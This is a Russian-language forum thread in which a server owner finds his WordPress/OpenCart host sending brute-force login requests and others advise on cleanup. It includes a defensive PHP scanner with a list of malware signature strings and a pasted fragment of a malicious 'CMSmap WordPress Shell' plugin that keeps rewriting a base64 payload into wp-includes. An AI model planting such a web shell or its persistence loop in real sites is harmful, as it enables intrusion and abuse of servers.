DOS attack из моего сервера / Unix-системы

ReSQL.ru

Мобильная версия Контакт Правила FAQ Помощь

Гость

Войти | Регистрация | Профиль | Очистить

Новые сообщения | Избранное

Форумы | Пользователи | Статистика | Мод. лог | Поиск

Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр

Форумы / Unix-системы [игнор отключен] [закрыт для гостей] / DOS attack из моего сервера

25 сообщений из 27, страница 1 из 2

все

DOS attack из моего сервера

#40011121

YuriyB

Участник

Сообщения: 1 124

Рейтинг: 0 / 0

Добрый день,

мне пожаловались , что из моего сервера идут запросы вида

- - [23/Oct/2020:04:24:45 +0200] "GET /wp-login.php HTTP/1.1" 200 1761 "-"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
5.45.107.161 - - [23/Oct/2020:04:24:45 +0200] "POST /xmlrpc.php HTTP/1.1" 403 1228 "-"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
- - [23/Oct/2020:04:24:45 +0200] "POST /wp-login.php HTTP/1.1" 200 1851 "-"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
- - [23/Oct/2020:05:25:13 +0200] "POST /wp-login.php HTTP/1.1" 200 2642 "-"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
- - [23/Oct/2020:05:25:13 +0200] "POST /wp-login.php HTTP/1.1" 200 2626 "-"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"

как быстро определить, кто шлет такие запросы ?

ставил на сервер wordpress и opencard

на сервере стоить php nginx mysql

...

Рейтинг:

0 / 0

23.10.2020, 11:18

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011127

Алексей Роза

Гость

https://www.google.com/search?channel=fs&client=ubuntu&q=hacked server clean

...

Рейтинг:

0 / 0

23.10.2020, 11:28

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011142

peter64

Участник

Сообщения: 233

Рейтинг: 0 / 0

YuriyB,
1. Процесс на порту 80 : fuser 80/tcp. (1 цифра PID)
2.имя процесса : ls -l /proc/PID/exe
Ну а далее по обстоятельствам ...

...

Рейтинг:

0 / 0

23.10.2020, 12:19

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011148

Алексей Роза

Гость

запросы могут выходить с любого порта

...

Рейтинг:

0 / 0

23.10.2020, 12:41

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011156

Dimitry Sibiryakov

Участник

Сообщения: 54 521

Рейтинг: 0 / 0

И PID апача ничего не даст.

Аффтар, просто сноси всё и разворачивай чистый образ. Потом запрещай запись в каталоги со
скриптами своему апачу.
Posted via ActualForum NNTP Server 1.5

...

Рейтинг:

0 / 0

23.10.2020, 12:50

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011171

YuriyB

Участник

Сообщения: 1 124

Рейтинг: 0 / 0

Dimitry Sibiryakov,

вообще то у меня nginx

все таки хочу найти проблему.

жаль исходящие запросы не логируются

...

Рейтинг:

0 / 0

23.10.2020, 13:04

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011180

Dimitry Sibiryakov

Участник

Сообщения: 54 521

Рейтинг: 0 / 0

YuriyBжаль исходящие запросы не логируются

А смысл? Они будут идти от твоего nginx-а. Просто закрывай файерволлом исходящие
соединения на 80 и 403, а потом сравнивай список файлов скриптов с тем, который тебе
нужен. Лишние - читай или грепай на предмет "wp-login".
Posted via ActualForum NNTP Server 1.5

...

Рейтинг:

0 / 0

23.10.2020, 13:17

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011182

fkthat

Участник

Сообщения: 3 601

Рейтинг: 0 / 0

Dimitry Sibiryakov

сноси всё и разворачивай чистый образ.

Еще +10 баллов в пользу докеров.

...

Рейтинг:

0 / 0

23.10.2020, 13:21

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011234

Алексей Роза

Гость

YuriyB

Dimitry Sibiryakov,

вообще то у меня nginx

все таки хочу найти проблему.

жаль исходящие запросы не логируются

проблема в какой-нибудь дырявой CMS, типа WP или джумлы
или в их многочисленных плагинах, где дырявые каждый третий

...

Рейтинг:

0 / 0

23.10.2020, 14:49

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011267

YuriyB

Участник

Сообщения: 1 124

Рейтинг: 0 / 0

ну это понятно..

как найти кто отсылает , какой скрипт ?

...

Рейтинг:

0 / 0

23.10.2020, 15:45

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011276

mayton

Участник

Откуда: loopback

Сообщения: 53 422

Рейтинг: 0 / 0

YuriyB

ну это понятно..

как найти кто отсылает , какой скрипт ?

Попробуй отключи opencard и wordpress поочередно и понаблюдай.

Или если есть возможность подними opencard/wordpress в разных
окружениях (хостах или докерах) или в разных apache процессах.

Чтоб логи были раздельными.

Дальше - по ситуации.

...

Рейтинг:

0 / 0

23.10.2020, 15:59

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011366

Barlone

Участник

Сообщения: 1 506

Рейтинг: 0 / 0

mayton

А смысл отключать поочередно, когда сервер уже взломали и что-то туда залили? Или имеется ввиду установить начисто все заново, и ждать пока снова взломают?

...

Рейтинг:

0 / 0

23.10.2020, 19:09

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011374

fkthat

Участник

Сообщения: 3 601

Рейтинг: 0 / 0

YuriyB

жаль исходящие запросы не логируются

Воткнуть на время прокси может поможет? Но только непонятно, что тебе даст его лог исходящих. Покажет просто то же самое, что тебе жалобщики присылают.

...

Рейтинг:

0 / 0

23.10.2020, 19:25

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011383

mayton

Участник

Откуда: loopback

Сообщения: 53 422

Рейтинг: 0 / 0

Barlone

mayton

А это к автору вопрос. Он хочет разобраться от какого модуля идёт атака? Или просто устранить?

...

Рейтинг:

0 / 0

23.10.2020, 19:43

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011398

Алексей Роза

Гость

да там уже бэкдор на сервере

...

Рейтинг:

0 / 0

23.10.2020, 20:06

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011410

YuriyB

Участник

Сообщения: 1 124

Рейтинг: 0 / 0

mayton,

хочу разобраться..

...

Рейтинг:

0 / 0

23.10.2020, 20:32

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011411

YuriyB

Участник

Сообщения: 1 124

Рейтинг: 0 / 0

Алексей Роза,

есть какой то сканер для этого?

я пару запустил ничего не нашли

...

Рейтинг:

0 / 0

23.10.2020, 20:32

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011413

Алексей Роза

Гость

да есть там всякие, изучай
https://revisium.com/ru/we_can/

Код: php

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.

#!/usr/bin/php

<?php

/* вот скрипт, который ищет кое-какие инъекции (запускать из консоли):
предварительно сделать:
find -type -f -name "*.php" -print > list.txt
*/

$list = file("list.txt");

$v = array(
'$GLOBALS[$GLOBALS',
'$alphabet',
'get_root_path',
'bokoinchina',
'chosen_dirs_indexes',
'"test_url"',
"'test_url'",
'PCLZIP_READ_BLOCK',
'MD5(strrev',
'ALREADY_RUN',
'eval/*',
'@$_COOKIE["user"]',
'include_once("index.php")',
'@include "\x',
'file test okay',
'PCLZIP_SEPARATOR',
'index.html.bak.bak',
'<?php ${',
'#Yandex#',
'$user_agent_to_filter',
'"templates/".$dir."',
'].$GLOBALS[',
'($GLOBALS[$GLOBALS',
);

$files = array();

foreach ($list as $file){

    $file=trim($file);
    if($file=='') continue;

     if(filesize($file)<5) continue;

    $str=@file_get_contents($file);
    if(!$str||$str===false) { echo "\nunable open:\n{$file}\n";continue;}

    foreach ($v as $i){
       if(strpos($str,$i)!==false) {
         if(!isset($files[$file])) {
             $files[$file]="{$file} -- {$i}";
             echo "{$file} : {$i}\n";
         }
       }
   }
}

#fclose($a);

$z=fopen("__found__.txt","w");
fputs($z,join("\n",$files));
fclose($z);

я бы на твоём месте снёс всё говно с сервера
или даже переставил сервак
теперь как можно быть уверенным в чём-то

...

Рейтинг:

0 / 0

23.10.2020, 20:42

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011416

mayton

Участник

Откуда: loopback

Сообщения: 53 422

Рейтинг: 0 / 0

Так он не разберется.

...

Рейтинг:

0 / 0

23.10.2020, 20:50

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011426

Basil A. Sidorov

Участник

Сообщения: 11 633

Рейтинг: 0 / 0

Проблема: "Сервер заражён вирусом".
Решение: "Переустановить сервер начисто".
Возражение: "Так он ни в чём не разберётся".

...

Рейтинг:

0 / 0

23.10.2020, 21:38

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011434

Dimitry Sibiryakov

Участник

Сообщения: 54 521

Рейтинг: 0 / 0

YuriyBесть какой то сканер для этого?

grep.
Posted via ActualForum NNTP Server 1.5

...

Рейтинг:

0 / 0

23.10.2020, 22:00

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011440

YuriyB

Участник

Сообщения: 1 124

Рейтинг: 0 / 0

в папке плагинов ворпреса нашел какие то странные папки с названиями типа
vnaaqhb
внутри

Код: php

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.

<?php 
 /**
 * Plugin Name: CMSmap - WordPress Shell
 * Plugin URI: https://github.com/m7x/cmsmap/
 * Description: Simple WordPress Shell - Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program.
 * Version: 1.0
 * Author: CMSmap
 * Author URI: https://github.com/m7x/cmsmap/
 * License: GPLv2
 */
 set_time_limit(0);ignore_user_abort(1);while(1){file_put_contents($_SERVER['DOCUMENT_ROOT'].'//wp-includes//css//css.php',base64_decode('PD9waHANCi8qKg0KICog...........................

а что они могли еще натровориь, кроме рассылки дос аттак ?

...

Рейтинг:

0 / 0

23.10.2020, 22:15

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011442

YuriyB

Участник

Сообщения: 1 124

Рейтинг: 0 / 0

YuriyB,

логирование исходящего трафика лучше с

iptables -I OUTPUT -j LOG --log-prefix "iptables: "

можно добавлять много параметров

...

Рейтинг:

0 / 0

23.10.2020, 22:19

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011443

mayton

Участник

Откуда: loopback

Сообщения: 53 422

Рейтинг: 0 / 0

Basil A. Sidorov

Переустановит начисто тот-же состав плагинов и - вуаля. Снова вирус.

...

Рейтинг:

0 / 0

23.10.2020, 22:23

| Ответить | Цитировать | Написать

DOS attack из моего сервера

#40011445

Basil A. Sidorov

Участник

Сообщения: 11 633

Рейтинг: 0 / 0

mayton

Переустановит начисто тот-же состав плагинов и - вуаля. Снова вирус.

может не будем опускаться до анекдотических ситуаций?В атаке участвовало восемьсот миллионов китайцев.
Каждый второй использовал пароль "МаоДзедун".
На 423896-й попытке сервер согласился, что его пароль - "МаоДзедун".

Мысль: "надо что-нибудь поменять" - настолько свежая и оригинальная, что вообще никак не укладывается в мозг, испорченный режимом "Next, next, next"?

...

Рейтинг:

0 / 0

23.10.2020, 22:46

| Ответить | Цитировать | Написать

25 сообщений из 27, страница 1 из 2

все

Форумы / Unix-системы [игнор отключен] [закрыт для гостей] / DOS attack из моего сервера

Цитировать

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вложение:

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=25&fpage=3&tid=1480978]:	0ms
get settings:	11ms
get forum list:	13ms
check forum access:	4ms
check topic access:	4ms
track hit:	26ms
get topic data:	13ms
get forum data:	3ms
get page messages:	60ms
get tp. blocked users:	1ms
others:	243ms

total:	378ms